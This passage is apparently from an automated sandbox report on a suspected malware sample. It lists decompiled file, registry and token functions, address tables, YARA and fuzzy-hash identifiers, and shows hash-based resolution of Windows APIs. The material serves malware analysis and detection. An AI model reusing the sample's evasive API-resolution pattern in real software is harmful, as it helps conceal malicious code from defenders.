RegQueryValueExA.KERNELBASE(?,6E71D1F8,00000000,?,00000000,00000000,?,?,?,6E71D1F8,?,6E715887,?,00000000,00000000), ref: 6E71580B
RegQueryValueExA.KERNELBASE(?,6E71D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E71D1F8,?,6E715887,?,00000000), ref: 6E715856

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 24cde6cc3f61d6074561f22d5de6c5c179308c6c67170b9f61b250aca94c6fcc
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: CB11907021D306ABD7589EA5AE90EEBBBDCEF45754F04882DB49497161EB21E800CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E715B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E715B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E70D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E70D6D0(__ecx, _t60);
					E6E70CFF8(_t56,  *_t60);
					E6E70CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E7162B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E70C26C(_t40);
					if(E6E70C280(_t40) != 0) {
						_t56[2] = E6E7135F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E713064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E713698(_t59, 0xff, 8);
						if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e715b43
0x6e715b45
0x6e715b52
0x6e715b56
0x6e715b5a
0x6e715b64
0x6e715b6b
0x6e715b6b
0x6e715b72
0x6e715b74
0x6e715b79
0x6e715b82
0x6e715b8a
0x6e715b8a
0x6e715b7b
0x6e715b7d
0x6e715b7d
0x6e715b79
0x6e715b8f
0x6e715b9b
0x6e715ccc
0x6e715c09
0x6e715c12
0x6e715c13
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x00000000
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cae
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x00000000
0x6e715c92
0x6e715ba1
0x6e715bb1
0x6e715bb1

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36769bfa11c4caf2b6326acb467fc0a09a026408e7cf74665a34eff160248e9c
Instruction ID: 2e921fdf05e32904d37bbfcaf2bef9d857a5e3e0729f1bd680de9c4058f01923
Opcode Fuzzy Hash: 36769bfa11c4caf2b6326acb467fc0a09a026408e7cf74665a34eff160248e9c
Instruction Fuzzy Hash: CA31387034C30ABEE7582EF56F89FEB76DEDF81648F084838F941951A5DE219904C761

Uniqueness

Uniqueness Score: -1.00%

Function 00A426AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E00A41ED2(__eflags);
				_t29 = E00A4180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E00A4200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E00A41000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E00A416D7();
				 *_t56 = _v20; // executed
				E00A42092(_t47, _t54, _t55); // executed
				return 0;
			}

0x00a426aa
0x00a426b3
0x00a426b6
0x00a426b9
0x00a426c1
0x00a426c4
0x00a426cc
0x00a426cf
0x00a426d4
0x00a426da
0x00a426dd
0x00a426e0
0x00a426e0
0x00a4270e
0x00a42711
0x00a42719
0x00a4271c
0x00a4271f
0x00a42727
0x00a4272a
0x00a4272d
0x00a42734
0x00a42736
0x00a42739
0x00a4273c
0x00a4273f
0x00a42742
0x00a42706
0x00a42706
0x00a4276e
0x00a426ea
0x00a426ec
0x00a426ec
0x00a42749
0x00a4274c
0x00a42754
0x00a42757
0x00a42765

APIs

FreeConsole.KERNELBASE ref: 00A426EA

Memory Dump Source

Source File: 00000000.00000002.1057781343.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: c5c5e2304bceb06d7d96fd05b1baba9ce378e508d621d6ddead8bf3ed28ff1e8
Instruction ID: 41009f948caeb6adcaab4571df4441cb52214b2959b88d17fc7d986b0873e043
Opcode Fuzzy Hash: c5c5e2304bceb06d7d96fd05b1baba9ce378e508d621d6ddead8bf3ed28ff1e8
Instruction Fuzzy Hash: D421F8B9D0421A8FCB00EFB9D985AAEBBF0FF88310F554829E445AB341E7359980CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E711166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E711166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6e711168
0x6e71116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E71117B

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 704b70e38f4e7dd0bbb4590bff2b4e6fbd06d2c523a211e685866a42431ef3d5
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: 8B113A7070C7835AFF5685E89E74BEF36988F62300F184875E860CE4F4CA24C888CA23

Uniqueness

Uniqueness Score: -1.00%

Function 6E715BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E715BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E70C26C(_t24);
					if(E6E70C280(_t24) != 0) {
						_t33[2] = E6E7135F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E713064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E713698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e715be5
0x6e715be7
0x6e715bfe
0x6e715c09
0x6e715c12
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x6e715cc6
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c72
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x6e715c92
0x6e715c92
0x6e715be9
0x6e715be9
0x6e715bf0
0x6e715bf0
0x6e715c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E715C3E

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 11077788539b029a983b14aac0b869b180cd236511d2106fd5346c3d813d1c67
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 8801497428C307BEF7581EE56F48FFB778EDB81248F184835B901A55A4EF226458C720

Uniqueness

Uniqueness Score: -1.00%

Function 6E715BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E715BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E70C26C(_t24);
				if(E6E70C280(_t24) != 0) {
					_t34[2] = E6E7135F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E713064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E713698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e715bbd
0x6e715bc1
0x6e715bc4
0x6e715bc7
0x6e715c09
0x6e715c12
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x6e715cc6
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c72
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x6e715c92
0x6e715c92
0x6e715c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E715C3E

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: aef2a6d2164c3c9adb59e58c36af6d0379523487fd54cd55d6a2e92b3cc1c304
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: 9D01267138830BBEFB582EE46F48FFB778DCFC1298F094835BA01651A5EA1258598620

Uniqueness

Uniqueness Score: -1.00%

Function 6E715BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E715BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E70C26C(_t24);
				if(E6E70C280(_t24) != 0) {
					_t34[2] = E6E7135F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E713064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E713698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e715bd1
0x6e715bd8
0x6e715bdb
0x6e715c09
0x6e715c12
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x6e715cc6
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c72
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x6e715c92
0x6e715c92
0x6e715c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E715C3E

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 4ae11d36d65d813e1be6d6f725e5e8772296ba0291458d8453ed3b6643a2a571
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 9701497434830BBEF7542EE56F48FFB728ECB81258F094835BA01951E5EE225858C320

Uniqueness

Uniqueness Score: -1.00%

Function 6E715BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E715BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E70C26C(_t23);
				if(E6E70C280(_t23) != 0) {
					_t31[2] = E6E7135F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E713064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E713698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e715bb3
0x6e715bba
0x6e715c09
0x6e715c12
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x6e715cc6
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c72
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x6e715c92
0x6e715c92
0x6e715c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E715C3E

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: c87e8781f588e5cb8a5f3c678bb073382c7afa0920da5502d0387b5cdeac45dc
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: A001287128830BBAF7542EE46F48FFB768DCB81258F084835BA01651A4DE126558C720

Uniqueness

Uniqueness Score: -1.00%

Function 6E715C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E715C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E713064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E70C26C(_t23);
				if(E6E70C280(_t23) != 0) {
					_t31[2] = E6E7135F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E713064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E713698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E713064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e715c01
0x6e715c05
0x6e715c09
0x6e715c12
0x6e715c18
0x6e715c19
0x6e715c0b
0x6e715c0d
0x6e715c0d
0x6e715c2f
0x6e715c43
0x6e715c31
0x6e715c3e
0x6e715c40
0x6e715c40
0x6e715c45
0x6e715c4a
0x6e715c58
0x6e715cc3
0x6e715cc6
0x6e715c5a
0x6e715c5f
0x6e715cac
0x6e715cb0
0x6e715cba
0x6e715cba
0x6e715cb0
0x6e715c61
0x6e715c6d
0x6e715c72
0x6e715c86
0x6e715c88
0x6e715c89
0x6e715c8a
0x6e715c8c
0x6e715c8e
0x6e715c8f
0x6e715c8f
0x6e715c92
0x6e715c92
0x6e715c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E715C3E

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: a772ddbabdb6f5a3e013ece4a95df74c78b5666aa2d2fc26c692180faa82e48f
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: DB01473138830BBAE7542EE06F48FFB778ECF81698F084835BA01651A5EE226558C720

Uniqueness

Uniqueness Score: -1.00%

Function 6E715E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E715E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E70C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E713064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e715e14
0x6e715e15
0x6e715e17
0x6e715e1d
0x6e715e1f
0x6e715e23
0x6e715e23
0x6e715e27
0x6e715e33
0x6e715e67
0x6e715e67
0x00000000
0x6e715e35
0x6e715e3a
0x6e715e3b
0x6e715e4f
0x6e715e60
0x6e715e51
0x6e715e5c
0x6e715e5c
0x6e715e65
0x6e715e6d
0x6e715e6f
0x6e715e72
0x6e715e77
0x6e715e77
0x6e715e7b
0x6e715e80
0x00000000
0x00000000
0x00000000
0x6e715e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E715D48,?,?), ref: 6E715E5C

Memory Dump Source

Source File: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Offset: 6E700000, based on PE: true

Associated: 00000000.00000002.1058138824.000000006E700000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058162892.000000006E71A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1058172401.000000006E71D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1058180186.000000006E71F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 72184386741e93ab051dafe097153cf9f1a68209774d307c977190a08a247263
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
